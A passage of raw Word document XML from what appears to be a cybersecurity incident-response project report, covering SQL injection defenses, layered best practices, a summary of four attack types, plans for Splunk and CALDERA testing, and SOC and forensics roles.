        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Implement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Web Application Firewalls (WAFs)</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28601A1A" w14:textId="7359BD14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Apply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principle of least privilege</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for database accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="166587AE" w:rsidRDefault="732EE1AE" w14:paraId="70CDDDCC" w14:textId="3FD22A6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct regular </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerability assessments</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">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60936C5F" w14:textId="6754D253">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overall Best Practices Across All Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="5B1A5A65" w14:textId="6CDD16A2">
      <w:p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To </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maintain</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 mature and resilient cybersecurity posture, organizations should adopt a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layered defense strategy</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combining technology, policy, and human awareness:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6270E3CD" w14:textId="435D7D21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Regular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security awareness training</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for employees.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="2F6AD811" w14:textId="34742F51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Implementation of a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Security Information and Event Management (SIEM)</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system for monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="54876D27" w14:textId="637613F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Regular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incident response drills</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and tabletop exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="0990A029" w14:textId="4AEB070F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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Continuous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vulnerability management and patching</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1BE0CA2B" w14:textId="47BCF3DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:num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Integration of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threat intelligence</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for proactive detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="00193207" w14:textId="44C0EEDF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="6A77951F" w14:textId="2EB5AD28">
      <w:p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The analysis of the four attack types —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Phishing, DDoS, Insider Threats, and SQL Injection</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 </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates</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the wide range of challenges that organizations face in cybersecurity. Each attack highlights a different dimension of vulnerability: human error in phishing, system overload in DDoS, internal misuse in insider threats, and application-layer weaknesses in SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="09F53D38" w14:textId="7933B312">
      <w:p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The reviewed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case studies</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further emphasize that real-world incidents often arise from a lack of preparation, poor detection mechanisms, and insufficient response coordination. These findings underscore the importance of having a structured and tested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Incident Response Plan (IRP)</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that addresses all phases of an incident — from preparation and detection to containment, eradication, and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="4C9A3E27" w14:textId="35EF5119">
      <w:p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Building upon the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NIST SP 800-61</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framework as the project’s foundation, supported by the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practical flexibility of the SANS model</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and the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governance alignment of ISO/IEC 27035</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the next stage of this project will focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>developing and testing a comprehensive Incident Response Plan</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="43418316">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43418316" w:rsidP="732EE1AE" w:rsidRDefault="43418316" w14:paraId="368A99A5" w14:textId="2C85A4E0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This plan will integrate technical monitoring through </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4D9AC929">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SIEM</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, attack simulation using </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALDERA</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the adversary and command-and-control platform, and real attack scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>insider threats</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objective</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="769BA0CF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to design a response framework that is both technically sound and operationally effective — ensuring rapid detection, containment, and recovery from security incidents in a realistic environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="198B98CA" w:rsidP="166587AE" w:rsidRDefault="198B98CA" w14:paraId="0FE46B9F" w14:textId="4AFA5195">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="198B98CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Roles, Responsibilities &amp; Incident Response Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidRDefault="166587AE" w14:paraId="7048E674" w14:textId="085F63EB"/>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5DC39804" w14:textId="5605F713">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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1. Roles &amp; Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7E82781B" w14:textId="41D6FAE6">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A successful incident response program depends on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clear ownership</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Each role must understand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what they do</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when</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and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why</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3FA55D2F" w14:textId="39396429">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1.1 Incident Commander</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7F329C3E" w14:textId="560FC7BB">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The overall leader of the incident.</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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0828B5EE" w14:textId="56619484">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Makes major decisions (containment, communication, recovery direction).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="55FD5148" w14:textId="5AAFBE4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Coordinates between technical teams, management, and legal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3B05F788" w14:textId="34A1295D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Ensures the incident is handled according to policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="309CB719" w14:textId="1F76899E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Approves escalation or involvement of external partners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="45411959" w14:textId="0BFED257">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Why important?</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Without a clear commander, response becomes chaotic and uncoordinated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="66AF40F7" w14:textId="08E95ED3">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1.2 SOC Analyst L1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="639DC480" w14:textId="41A0D65F">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The first line of defense.</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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7AF08FBE" w14:textId="00B07751">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Monitor SIEM/EDR alerts 24/7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5CD13A3D" w14:textId="21B988A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Perform initial triage and determine alert relevance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="08385A1C" w14:textId="5A4D6244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Identify False Positive vs True Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="26D99C7E" w14:textId="4EE423B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Document all actions and escalate TP to L2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="56BE06DD" w14:textId="4BA243DC">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Why important?</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They prevent the team from being overwhelmed by noise and focus only on real threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="078CF192" w14:textId="7A6F08AF">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1.3 SOC Analyst L2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2BE7C46E" w14:textId="3CCD7E57">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More technical and investigative.</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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="30179D30" w14:textId="28D28366">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Deep-dive analysis (process trees, logs, network flows).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="45258A07" w14:textId="3C7B2100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Identify attacker techniques (TTPs / MITRE ATT&amp;CK).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="77E0393B" w14:textId="20A08103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Perform containment actions (isolation, account disablement).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="71533141" w14:textId="3F0FDD90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Support the Incident Commander with technical recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3784056A" w14:textId="4369135F">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Why important?</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They turn a raw alert into a full understanding of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="6DD53C6C" w14:textId="72A9B6B1">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1.4 Forensics Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7DEAF536" w14:textId="0695DE50">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They ensure evidence is preserved properly.</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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5411AA36" w14:textId="71D6AB51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Capture volatile data (RAM, network connections).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="466CE568" w14:textId="0C8132B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Collect and preserve disk images.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0B727746" w14:textId="3574BCE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Reverse engineer malware if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3546D490" w14:textId="321CA2AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Identify root cause and timeline of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3BEEE7D1" w14:textId="7AB8F4DF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
